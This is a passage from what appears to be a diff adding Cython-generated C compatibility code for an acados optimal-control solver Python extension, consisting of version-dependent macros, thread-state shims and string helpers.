+#else + #define __Pyx_IS_TYPE(ob, type) (((const PyObject*)ob)->ob_type == (type)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_Is) + #define __Pyx_Py_Is(x, y) Py_Is(x, y) +#else + #define __Pyx_Py_Is(x, y) ((x) == (y)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsNone) + #define __Pyx_Py_IsNone(ob) Py_IsNone(ob) +#else + #define __Pyx_Py_IsNone(ob) __Pyx_Py_Is((ob), Py_None) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsTrue) + #define __Pyx_Py_IsTrue(ob) Py_IsTrue(ob) +#else + #define __Pyx_Py_IsTrue(ob) __Pyx_Py_Is((ob), Py_True) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsFalse) + #define __Pyx_Py_IsFalse(ob) Py_IsFalse(ob) +#else + #define __Pyx_Py_IsFalse(ob) __Pyx_Py_Is((ob), Py_False) +#endif +#define __Pyx_NoneAsNull(obj) (__Pyx_Py_IsNone(obj) ? NULL : (obj)) +#if PY_VERSION_HEX >= 0x030900F0 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_GC_IsFinalized(o) PyObject_GC_IsFinalized(o) +#else + #define __Pyx_PyObject_GC_IsFinalized(o) _PyGC_FINALIZED(o) +#endif +#ifndef CO_COROUTINE + #define CO_COROUTINE 0x80 +#endif +#ifndef CO_ASYNC_GENERATOR + #define CO_ASYNC_GENERATOR 0x200 +#endif +#ifndef Py_TPFLAGS_CHECKTYPES + #define Py_TPFLAGS_CHECKTYPES 0 +#endif +#ifndef Py_TPFLAGS_HAVE_INDEX + #define Py_TPFLAGS_HAVE_INDEX 0 +#endif +#ifndef Py_TPFLAGS_HAVE_NEWBUFFER + #define Py_TPFLAGS_HAVE_NEWBUFFER 0 +#endif +#ifndef Py_TPFLAGS_HAVE_FINALIZE + #define Py_TPFLAGS_HAVE_FINALIZE 0 +#endif +#ifndef Py_TPFLAGS_SEQUENCE + #define Py_TPFLAGS_SEQUENCE 0 +#endif +#ifndef Py_TPFLAGS_MAPPING + #define Py_TPFLAGS_MAPPING 0 +#endif +#ifndef METH_STACKLESS + #define METH_STACKLESS 0 +#endif +#if PY_VERSION_HEX <= 0x030700A3 || !defined(METH_FASTCALL) + #ifndef METH_FASTCALL + #define METH_FASTCALL 0x80 + #endif + typedef PyObject *(*__Pyx_PyCFunctionFast) (PyObject *self, PyObject *const *args, Py_ssize_t nargs); + typedef PyObject *(*__Pyx_PyCFunctionFastWithKeywords) (PyObject *self, PyObject *const *args, + Py_ssize_t nargs, PyObject *kwnames); +#else + #define __Pyx_PyCFunctionFast _PyCFunctionFast + #define __Pyx_PyCFunctionFastWithKeywords _PyCFunctionFastWithKeywords +#endif +#if CYTHON_METH_FASTCALL + #define __Pyx_METH_FASTCALL METH_FASTCALL + #define __Pyx_PyCFunction_FastCall __Pyx_PyCFunctionFast + #define __Pyx_PyCFunction_FastCallWithKeywords __Pyx_PyCFunctionFastWithKeywords +#else + #define __Pyx_METH_FASTCALL METH_VARARGS + #define __Pyx_PyCFunction_FastCall PyCFunction + #define __Pyx_PyCFunction_FastCallWithKeywords PyCFunctionWithKeywords +#endif +#if CYTHON_VECTORCALL + #define __pyx_vectorcallfunc vectorcallfunc + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET PY_VECTORCALL_ARGUMENTS_OFFSET + #define __Pyx_PyVectorcall_NARGS(n) PyVectorcall_NARGS((size_t)(n)) +#elif CYTHON_BACKPORT_VECTORCALL + typedef PyObject *(*__pyx_vectorcallfunc)(PyObject *callable, PyObject *const *args, + size_t nargsf, PyObject *kwnames); + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET ((size_t)1 << (8 * sizeof(size_t) - 1)) + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(((size_t)(n)) & ~__Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET)) +#else + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET 0 + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(n)) +#endif +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) ((void)m, PyType_FromSpecWithBases(s, b)) + typedef PyObject *(*__Pyx_PyCMethod)(PyObject *, PyTypeObject *, PyObject *const *, size_t, PyObject *); +#else + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) PyType_FromModuleAndSpec(m, s, b) + #define __Pyx_PyCMethod PyCMethod +#endif +#ifndef METH_METHOD + #define METH_METHOD 0x200 +#endif +#if CYTHON_COMPILING_IN_PYPY && !defined(PyObject_Malloc) + #define PyObject_Malloc(s) PyMem_Malloc(s) + #define PyObject_Free(p) PyMem_Free(p) + #define PyObject_Realloc(p) PyMem_Realloc(p) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) +#else + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) (frame)->f_lineno = (lineno) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyThreadState_Current PyThreadState_Get() +#elif !CYTHON_FAST_THREAD_STATE + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#elif PY_VERSION_HEX >= 0x03060000 + #define __Pyx_PyThreadState_Current _PyThreadState_UncheckedGet() +#elif PY_VERSION_HEX >= 0x03000000 + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#else + #define __Pyx_PyThreadState_Current _PyThreadState_Current +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE void *__Pyx_PyModule_GetState(PyObject *op) +{ + void *result; + result = PyModule_GetState(op); + if (!result) + Py_FatalError("Couldn't find the module state"); + return result; +} +#endif +#define __Pyx_PyObject_GetSlot(obj, name, func_ctype) __Pyx_PyType_GetSlot(Py_TYPE(obj), name, func_ctype) +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((func_ctype) PyType_GetSlot((type), Py_##name)) +#else + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((type)->name) +#endif +#if PY_VERSION_HEX < 0x030700A2 && !defined(PyThread_tss_create) && !defined(Py_tss_NEEDS_INIT) +#include "pythread.h" +#define Py_tss_NEEDS_INIT 0 +typedef int Py_tss_t; +static CYTHON_INLINE int PyThread_tss_create(Py_tss_t *key) { + *key = PyThread_create_key(); + return 0; +} +static CYTHON_INLINE Py_tss_t * PyThread_tss_alloc(void) { + Py_tss_t *key = (Py_tss_t *)PyObject_Malloc(sizeof(Py_tss_t)); + *key = Py_tss_NEEDS_INIT; + return key; +} +static CYTHON_INLINE void PyThread_tss_free(Py_tss_t *key) { + PyObject_Free(key); +} +static CYTHON_INLINE int PyThread_tss_is_created(Py_tss_t *key) { + return *key != Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE void PyThread_tss_delete(Py_tss_t *key) { + PyThread_delete_key(*key); + *key = Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE int PyThread_tss_set(Py_tss_t *key, void *value) { + return PyThread_set_key_value(*key, value); +} +static CYTHON_INLINE void * PyThread_tss_get(Py_tss_t *key) { + return PyThread_get_key_value(*key); +} +#endif +#if PY_MAJOR_VERSION < 3 + #if CYTHON_COMPILING_IN_PYPY + #if PYPY_VERSION_NUM < 0x07030600 + #if defined(__cplusplus) && __cplusplus >= 201402L + [[deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")]] + #elif defined(__GNUC__) || defined(__clang__) + __attribute__ ((__deprecated__("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6"))) + #elif defined(_MSC_VER) + __declspec(deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")) + #endif + static CYTHON_INLINE int PyGILState_Check(void) { + return 0; + } + #else // PYPY_VERSION_NUM < 0x07030600 + #endif // PYPY_VERSION_NUM < 0x07030600 + #else + static CYTHON_INLINE int PyGILState_Check(void) { + PyThreadState * tstate = _PyThreadState_Current; + return tstate && (tstate == PyGILState_GetThisThreadState()); + } + #endif +#endif +#if CYTHON_COMPILING_IN_CPYTHON || defined(_PyDict_NewPresized) +#define __Pyx_PyDict_NewPresized(n) ((n <= 8) ? PyDict_New() : _PyDict_NewPresized(n)) +#else +#define __Pyx_PyDict_NewPresized(n) PyDict_New() +#endif +#if PY_MAJOR_VERSION >= 3 || CYTHON_FUTURE_DIVISION + #define __Pyx_PyNumber_Divide(x,y) PyNumber_TrueDivide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceTrueDivide(x,y) +#else + #define __Pyx_PyNumber_Divide(x,y) PyNumber_Divide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceDivide(x,y) +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX > 0x030600B4 && CYTHON_USE_UNICODE_INTERNALS +#define __Pyx_PyDict_GetItemStrWithError(dict, name) _PyDict_GetItem_KnownHash(dict, name, ((PyASCIIObject *) name)->hash) +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStr(PyObject *dict, PyObject *name) { + PyObject *res = __Pyx_PyDict_GetItemStrWithError(dict, name); + if (res == NULL) PyErr_Clear(); + return res; +} +#elif PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) +#define __Pyx_PyDict_GetItemStrWithError PyDict_GetItemWithError +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#else +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStrWithError(PyObject *dict, PyObject *name) { +#if CYTHON_COMPILING_IN_PYPY + return PyDict_GetItem(dict, name); +#else + PyDictEntry *ep; + PyDictObject *mp = (PyDictObject*) dict; + long hash = ((PyStringObject *) name)->ob_shash; + assert(hash != -1); + ep = (mp->ma_lookup)(mp, name, hash); + if (ep == NULL) { + return NULL; + } + return ep->me_value; +#endif +} +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#endif +#if CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyType_GetFlags(tp) (((PyTypeObject *)tp)->tp_flags) + #define __Pyx_PyType_HasFeature(type, feature) ((__Pyx_PyType_GetFlags(type) & (feature)) != 0) + #define __Pyx_PyObject_GetIterNextFunc(obj) (Py_TYPE(obj)->tp_iternext) +#else + #define __Pyx_PyType_GetFlags(tp) (PyType_GetFlags((PyTypeObject *)tp)) + #define __Pyx_PyType_HasFeature(type, feature) PyType_HasFeature(type, feature) + #define __Pyx_PyObject_GetIterNextFunc(obj) PyIter_Next +#endif +#if CYTHON_USE_TYPE_SPECS && PY_VERSION_HEX >= 0x03080000 +#define __Pyx_PyHeapTypeObject_GC_Del(obj) {\ + PyTypeObject *type = Py_TYPE(obj);\ + assert(__Pyx_PyType_HasFeature(type, Py_TPFLAGS_HEAPTYPE));\ + PyObject_GC_Del(obj);\ + Py_DECREF(type);\ +} +#else +#define __Pyx_PyHeapTypeObject_GC_Del(obj) PyObject_GC_Del(obj) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define CYTHON_PEP393_ENABLED 1 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GetLength(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_ReadChar(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((void)u, 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((void)u, (0)) + #define __Pyx_PyUnicode_DATA(u) ((void*)u) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)k, PyUnicode_ReadChar((PyObject*)(d), i)) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GetLength(u)) +#elif PY_VERSION_HEX > 0x03030000 && defined(PyUnicode_KIND) + #define CYTHON_PEP393_ENABLED 1 + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_READY(op) (0) + #else + #define __Pyx_PyUnicode_READY(op) (likely(PyUnicode_IS_READY(op)) ?\ + 0 : _PyUnicode_Ready((PyObject *)(op))) + #endif + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_LENGTH(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_READ_CHAR(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) PyUnicode_MAX_CHAR_VALUE(u) + #define __Pyx_PyUnicode_KIND(u) ((int)PyUnicode_KIND(u)) + #define __Pyx_PyUnicode_DATA(u) PyUnicode_DATA(u) + #define __Pyx_PyUnicode_READ(k, d, i) PyUnicode_READ(k, d, i) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) PyUnicode_WRITE(k, d, i, (Py_UCS4) ch) + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_LENGTH(u)) + #else + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03090000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : ((PyCompactUnicodeObject *)(u))->wstr_length)) + #else + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : PyUnicode_GET_SIZE(u))) + #endif + #endif +#else + #define CYTHON_PEP393_ENABLED 0 + #define PyUnicode_1BYTE_KIND 1 + #define PyUnicode_2BYTE_KIND 2 + #define PyUnicode_4BYTE_KIND 4 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_SIZE(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) ((Py_UCS4)(PyUnicode_AS_UNICODE(u)[i])) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((sizeof(Py_UNICODE) == 2) ? 65535U : 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((int)sizeof(Py_UNICODE)) + #define __Pyx_PyUnicode_DATA(u) ((void*)PyUnicode_AS_UNICODE(u)) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)(k), (Py_UCS4)(((Py_UNICODE*)d)[i])) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) (((void)(k)), ((Py_UNICODE*)d)[i] = (Py_UNICODE) ch) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_SIZE(u)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyUnicode_Concat(a, b) PyNumber_Add(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) PyNumber_Add(a, b) +#else + #define __Pyx_PyUnicode_Concat(a, b) PyUnicode_Concat(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) ((unlikely((a) == Py_None) || unlikely((b) == Py_None)) ?\ + PyNumber_Add(a, b) : __Pyx_PyUnicode_Concat(a, b)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #if !defined(PyUnicode_DecodeUnicodeEscape) + #define PyUnicode_DecodeUnicodeEscape(s, size, errors) PyUnicode_Decode(s, size, "unicode_escape", errors) + #endif + #if !defined(PyUnicode_Contains) || (PY_MAJOR_VERSION == 2 && PYPY_VERSION_NUM < 0x07030500) + #undef PyUnicode_Contains + #define PyUnicode_Contains(u, s) PySequence_Contains(u, s) + #endif + #if !defined(PyByteArray_Check) + #define PyByteArray_Check(obj) PyObject_TypeCheck(obj, &PyByteArray_Type) + #endif + #if !defined(PyObject_Format) + #define PyObject_Format(obj, fmt) PyObject_CallMethod(obj, "__format__", "O", fmt) + #endif +#endif +#define __Pyx_PyString_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyString_Check(b) && !PyString_CheckExact(b)))) ? PyNumber_Remainder(a, b) : __Pyx_PyString_Format(a, b)) +#define __Pyx_PyUnicode_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyUnicode_Check(b) && !PyUnicode_CheckExact(b)))) ? PyNumber_Remainder(a, b) : PyUnicode_Format(a, b)) +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyString_Format(a, b) PyUnicode_Format(a, b) +#else + #define __Pyx_PyString_Format(a, b) PyString_Format(a, b) +#endif +#if PY_MAJOR_VERSION < 3 && !defined(PyObject_ASCII) + #define PyObject_ASCII(o) PyObject_Repr(o) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBaseString_Type PyUnicode_Type + #define PyStringObject PyUnicodeObject + #define PyString_Type PyUnicode_Type + #define PyString_Check PyUnicode_Check + #define PyString_CheckExact PyUnicode_CheckExact +#ifndef PyObject_Unicode + #define PyObject_Unicode PyObject_Str +#endif +#endif +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyBaseString_Check(obj) PyUnicode_Check(obj) + #define __Pyx_PyBaseString_CheckExact(obj) PyUnicode_CheckExact(obj) +#else + #define __Pyx_PyBaseString_Check(obj) (PyString_Check(obj) || PyUnicode_Check(obj)) + #define __Pyx_PyBaseString_CheckExact(obj) (PyString_CheckExact(obj) || PyUnicode_CheckExact(obj)) +#endif +#if CYTHON_COMPILING_IN_CPYTHON + #define __Pyx_PySequence_ListKeepNew(obj)\ + (likely(PyList_CheckExact(obj) && Py_REFCNT(obj) == 1) ? __Pyx_NewRef(obj) : PySequence_List(obj)) +#else + #define __Pyx_PySequence_ListKeepNew(obj) PySequence_List(obj) +#endif +#ifndef PySet_CheckExact + #define PySet_CheckExact(obj) __Pyx_IS_TYPE(obj, &PySet_Type) +#endif +#if PY_VERSION_HEX >= 0x030900A4 + #define __Pyx_SET_REFCNT(obj, refcnt) Py_SET_REFCNT(obj, refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SET_SIZE(obj, size) +#else + #define __Pyx_SET_REFCNT(obj, refcnt) Py_REFCNT(obj) = (refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SIZE(obj) = (size) +#endif +#if CYTHON_ASSUME_SAFE_MACROS + #define __Pyx_PySequence_SIZE(seq) Py_SIZE(seq) +#else + #define __Pyx_PySequence_SIZE(seq) PySequence_Size(seq) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyIntObject PyLongObject + #define PyInt_Type PyLong_Type + #define PyInt_Check(op) PyLong_Check(op) + #define PyInt_CheckExact(op) PyLong_CheckExact(op) + #define __Pyx_Py3Int_Check(op) PyLong_Check(op) + #define __Pyx_Py3Int_CheckExact(op) PyLong_CheckExact(op) + #define PyInt_FromString PyLong_FromString + #define PyInt_FromUnicode PyLong_FromUnicode + #define PyInt_FromLong PyLong_FromLong + #define PyInt_FromSize_t PyLong_FromSize_t + #define PyInt_FromSsize_t PyLong_FromSsize_t + #define PyInt_AsLong PyLong_AsLong + #define PyInt_AS_LONG PyLong_AS_LONG + #define PyInt_AsSsize_t PyLong_AsSsize_t + #define PyInt_AsUnsignedLongMask PyLong_AsUnsignedLongMask + #define PyInt_AsUnsignedLongLongMask PyLong_AsUnsignedLongLongMask + #define PyNumber_Int PyNumber_Long +#else + #define __Pyx_Py3Int_Check(op) (PyLong_Check(op) || PyInt_Check(op)) + #define __Pyx_Py3Int_CheckExact(op) (PyLong_CheckExact(op) || PyInt_CheckExact(op)) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBoolObject PyLongObject +#endif +#if PY_MAJOR_VERSION >= 3 && CYTHON_COMPILING_IN_PYPY + #ifndef PyUnicode_InternFromString + #define PyUnicode_InternFromString(s) PyUnicode_FromString(s) + #endif +#endif +#if PY_VERSION_HEX < 0x030200A4 + typedef long Py_hash_t; + #define __Pyx_PyInt_FromHash_t PyInt_FromLong + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsHash_t +#else + #define __Pyx_PyInt_FromHash_t PyInt_FromSsize_t + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsSsize_t +#endif +#if CYTHON_USE_ASYNC_SLOTS + #if PY_VERSION_HEX >= 0x030500B1 + #define __Pyx_PyAsyncMethodsStruct PyAsyncMethods + #define __Pyx_PyType_AsAsync(obj) (Py_TYPE(obj)->tp_as_async) + #else + #define __Pyx_PyType_AsAsync(obj) ((__Pyx_PyAsyncMethodsStruct*) (Py_TYPE(obj)->tp_reserved)) + #endif +#else + #define __Pyx_PyType_AsAsync(obj) NULL +#endif +#ifndef __Pyx_PyAsyncMethodsStruct + typedef struct { + unaryfunc am_await; + unaryfunc am_aiter; + unaryfunc am_anext; + } __Pyx_PyAsyncMethodsStruct; +#endif + +#if defined(_WIN32) || defined(WIN32) || defined(MS_WINDOWS) + #if !defined(_USE_MATH_DEFINES) + #define _USE_MATH_DEFINES + #endif +#endif +#include +#ifdef NAN +#define __PYX_NAN() ((float) NAN) +#else +static CYTHON_INLINE float __PYX_NAN() { + float value; + memset(&value, 0xFF, sizeof(value)); + return value; +} +#endif +#if defined(__CYGWIN__) && defined(_LDBL_EQ_DBL) +#define __Pyx_truncl trunc +#else +#define __Pyx_truncl truncl +#endif + +#define __PYX_MARK_ERR_POS(f_index, lineno) \ + { __pyx_filename = __pyx_f[f_index]; (void)__pyx_filename; __pyx_lineno = lineno; (void)__pyx_lineno; __pyx_clineno = __LINE__; (void)__pyx_clineno; } +#define __PYX_ERR(f_index, lineno, Ln_error) \ + { __PYX_MARK_ERR_POS(f_index, lineno) goto Ln_error; } + +#ifdef CYTHON_EXTERN_C + #undef __PYX_EXTERN_C + #define __PYX_EXTERN_C CYTHON_EXTERN_C +#elif defined(__PYX_EXTERN_C) + #ifdef _MSC_VER + #pragma message ("Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead.") + #else + #warning Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead. + #endif +#else + #ifdef __cplusplus + #define __PYX_EXTERN_C extern "C" + #else + #define __PYX_EXTERN_C extern + #endif +#endif + +#define __PYX_HAVE__acados_template__acados_ocp_solver_pyx +#define __PYX_HAVE_API__acados_template__acados_ocp_solver_pyx +/* Early includes */ +#include +#include "acados/ocp_nlp/ocp_nlp_common.h" +#include "acados_c/ocp_nlp_interface.h" +#include "acados_solver_lat.h" +#include + + /* Using NumPy API declarations from "numpy/__init__.cython-30.pxd" */ + +#include "numpy/arrayobject.h" +#include "numpy/ndarrayobject.h" +#include "numpy/ndarraytypes.h" +#include "numpy/arrayscalars.h" +#include "numpy/ufuncobject.h" +#include "pythread.h" +#include +#ifdef _OPENMP +#include +#endif /* _OPENMP */ + +#if defined(PYREX_WITHOUT_ASSERTIONS) && !defined(CYTHON_WITHOUT_ASSERTIONS) +#define CYTHON_WITHOUT_ASSERTIONS +#endif + +typedef struct {PyObject **p; const char *s; const Py_ssize_t n; const char* encoding; + const char is_unicode; const char is_str; const char intern; } __Pyx_StringTabEntry; + +#define __PYX_DEFAULT_STRING_ENCODING_IS_ASCII 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_UTF8 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT (PY_MAJOR_VERSION >= 3 && __PYX_DEFAULT_STRING_ENCODING_IS_UTF8) +#define __PYX_DEFAULT_STRING_ENCODING "" +#define __Pyx_PyObject_FromString __Pyx_PyBytes_FromString +#define __Pyx_PyObject_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#define __Pyx_uchar_cast(c) ((unsigned char)c) +#define __Pyx_long_cast(x) ((long)x) +#define __Pyx_fits_Py_ssize_t(v, type, is_signed) (\ + (sizeof(type) < sizeof(Py_ssize_t)) ||\ + (sizeof(type) > sizeof(Py_ssize_t) &&\ + likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX) &&\ + (!is_signed || likely(v > (type)PY_SSIZE_T_MIN ||\ + v == (type)PY_SSIZE_T_MIN))) ||\ + (sizeof(type) == sizeof(Py_ssize_t) &&\ + (is_signed || likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX))) ) +static CYTHON_INLINE int __Pyx_is_valid_index(Py_ssize_t i, Py_ssize_t limit) { + return (size_t) i < (size_t) limit; +} +#if defined (__cplusplus) && __cplusplus >= 201103L + #include + #define __Pyx_sst_abs(value) std::abs(value) +#elif SIZEOF_INT >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) abs(value) +#elif SIZEOF_LONG >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) labs(value) +#elif defined (_MSC_VER) + #define __Pyx_sst_abs(value) ((Py_ssize_t)_abs64(value)) +#elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define __Pyx_sst_abs(value) llabs(value) +#elif defined (__GNUC__) + #define __Pyx_sst_abs(value) __builtin_llabs(value) +#else + #define __Pyx_sst_abs(value) ((value<0) ? -value : value) +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject*); +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject*, Py_ssize_t* length); +#define __Pyx_PyByteArray_FromString(s) PyByteArray_FromStringAndSize((const char*)s, strlen((const char*)s)) +#define __Pyx_PyByteArray_FromStringAndSize(s, l) PyByteArray_FromStringAndSize((const char*)s, l) +#define __Pyx_PyBytes_FromString PyBytes_FromString +#define __Pyx_PyBytes_FromStringAndSize PyBytes_FromStringAndSize +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char*); +#if PY_MAJOR_VERSION < 3 + #define __Pyx_PyStr_FromString __Pyx_PyBytes_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#else + #define __Pyx_PyStr_FromString __Pyx_PyUnicode_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyUnicode_FromStringAndSize +#endif +#define __Pyx_PyBytes_AsWritableString(s) ((char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableSString(s) ((signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableUString(s) ((unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsString(s) ((const char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsSString(s) ((const signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsUString(s) ((const unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyObject_AsWritableString(s) ((char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableSString(s) ((signed char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableUString(s) ((unsigned char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsSString(s) ((const signed char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsUString(s) ((const unsigned char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_FromCString(s) __Pyx_PyObject_FromString((const char*)s) +#define __Pyx_PyBytes_FromCString(s) __Pyx_PyBytes_FromString((const char*)s) +#define __Pyx_PyByteArray_FromCString(s) __Pyx_PyByteArray_FromString((const char*)s) +#define __Pyx_PyStr_FromCString(s) __Pyx_PyStr_FromString((const char*)s) +#define __Pyx_PyUnicode_FromCString(s) __Pyx_PyUnicode_FromString((const char*)s) +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const wchar_t *u) +{ + const wchar_t *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#else +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const Py_UNICODE *u) +{ + const Py_UNICODE *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#endif +#define __Pyx_PyUnicode_FromOrdinal(o) PyUnicode_FromOrdinal((int)o) +#define __Pyx_PyUnicode_FromUnicode(u) PyUnicode_FromUnicode(u, __Pyx_Py_UNICODE_strlen(u)) +#define __Pyx_PyUnicode_FromUnicodeAndLength PyUnicode_FromUnicode +#define __Pyx_PyUnicode_AsUnicode PyUnicode_AsUnicode +#define __Pyx_NewRef(obj) (Py_INCREF(obj), obj) +#define __Pyx_Owned_Py_None(b) __Pyx_NewRef(Py_None) +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b); +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject*); +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject*); +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x); +#define __Pyx_PySequence_Tuple(obj)\ + (likely(PyTuple_CheckExact(obj)) ? __Pyx_NewRef(obj) : PySequence_Tuple(obj)) +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject*); +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t); +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject*); +#if CYTHON_ASSUME_SAFE_MACROS +#define __pyx_PyFloat_AsDouble(x) (PyFloat_CheckExact(x) ? PyFloat_AS_DOUBLE(x) : PyFloat_AsDouble(x)) +#else +#define __pyx_PyFloat_AsDouble(x) PyFloat_AsDouble(x) +#endif +#define __pyx_PyFloat_AsFloat(x) ((float) __pyx_PyFloat_AsDouble(x)) +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyNumber_Int(x) (PyLong_CheckExact(x) ? 